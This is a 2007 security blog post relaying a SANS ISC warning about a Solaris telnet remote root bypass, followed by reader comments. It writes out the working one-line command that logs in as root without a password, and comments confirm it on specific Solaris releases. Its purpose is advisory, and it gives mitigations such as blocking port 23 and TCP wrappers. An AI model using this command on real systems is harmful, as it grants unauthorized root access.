Security Information Vulnerability Research Security Blog

Solaris Telnet 0day or Embarrassment

February 12th, 2007 by SecuriTeam, Filed under: Commentary, Full Disclosure

johannes ullrich from the sans isc sent this to me and then i saw it on the dshield list:

if you run solaris, please check if you got telnet enabled now. if you
can, block port 23 at your perimeter. there is a fairly trivial solaris
telnet 0-day.

telnet -l “-froot” [hostname]

will give you root on many solaris systems with default installs
we are still testing. please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.

you mean they still use telnet?!

others mentioned the aix rlogin vulnerability (identical) from 1994:
http://www.cert.org/advisories/ca-1994-09.html

update from hd moore:
“but this bug isnt -froot, its -fanythingbutroot =p”

on the exploits@ mailing list and on dshield this vulnerability was
verified as real.

if sun doesn’t yet block port 23/tcp incoming on their /8, i’d make it a
strong suggestion.

anyone else running solaris?
i made a joke on this being a pr stunt for people to download solaris (to test this vulnerability), as apparently downloads are somewhat slow at the moment. :)

gadi evron,
ge@beyondsecurity.com.

DiggRedditSlashdotTwitThisSphinnStumbleUpondel.icio.usFacebookGoogleTechnoratiE-mail this story to a friend!

-

Is your site safe from SQL Injection attaks? Sign up for Beyond Security’s Automated Vulnerability Detection Service today!

9 Comments:

  1. Ant, on February 12th, 2007 at 3:51 am Said:

    Doesn’t this date from 1994? …

  2. sunshine, on February 12th, 2007 at 4:08 am Said:

    Yep, for another OS. Not a 0day either but rather fully disclosed, but that’s what the definition has become.

  3. xyberpix, on February 12th, 2007 at 11:59 am Said:

    This is just so amusing, as I recently went on a couple of Solaris 10 courses at Sun, and they we still teaching people to use telnet to get from one host to another!

    I mentioned the security implications and was told that on a secure network, telnet is fine!!

    bwhahahahaha

  4. dur.ch/, on February 12th, 2007 at 2:32 pm Said:

    Solaris: Root-Passwort vergessen? Nicht so schlimm……

    Wer das Root-Passwort zu seiner Solaris-Kiste vergessen hat, braucht keinen Reboot zu machen. Da telnet per Default eingeschaltet ist und dieses einen üblen 0-day Bug hat kann man einfach mit telnet -l “-froot” hostname einloggen. Ok, bei neueren Ve…

  5. Reyco, on February 13th, 2007 at 8:24 pm Said:

    Yeap. I tested on a few servers (Solaris X86) and sparc boxes and It works. Tested on Solaris 10 Rel 11/06 Sparc Solaris 10 06/06 X86

  6. Mike, on February 14th, 2007 at 9:52 am Said:

    Wow, this is great information. I was wondering if other software was affected by a simular flaw!

    This is very serious, probably the most serious flaw to come out this year.

  7. Brad Powell, on February 15th, 2007 at 1:15 am Said:

    Another thing that will help. In Solaris 9 and 10 tcp wrappers are built-in.
    edit /etc/default/inetd
    ENABLE_TCPWRAPPERS=YES

    build a /etc/hosts.allow and /etc/hosts.deny
    At least you can restrict which IP addresses can connect to in.telnetd (and any other inetd service for that matter)

  8. Weblog de Mauricio (W.O.L.F.) R. Arreola González, on February 22nd, 2007 at 5:28 pm Said:

    Boletín 00085 - 22/02/2007…

    1.- Dos nuevas fallas de seguridad en Firefox2.- Borrado no autorizado de archivos a través de rm en……

  9. aloner, on June 6th, 2008 at 5:08 pm Said:

    o fuck it was gotton from 1994?
    where is the latest and there is nothing for down

Leave a Comment

Security RSS Subscribe


Vulnerability Scanner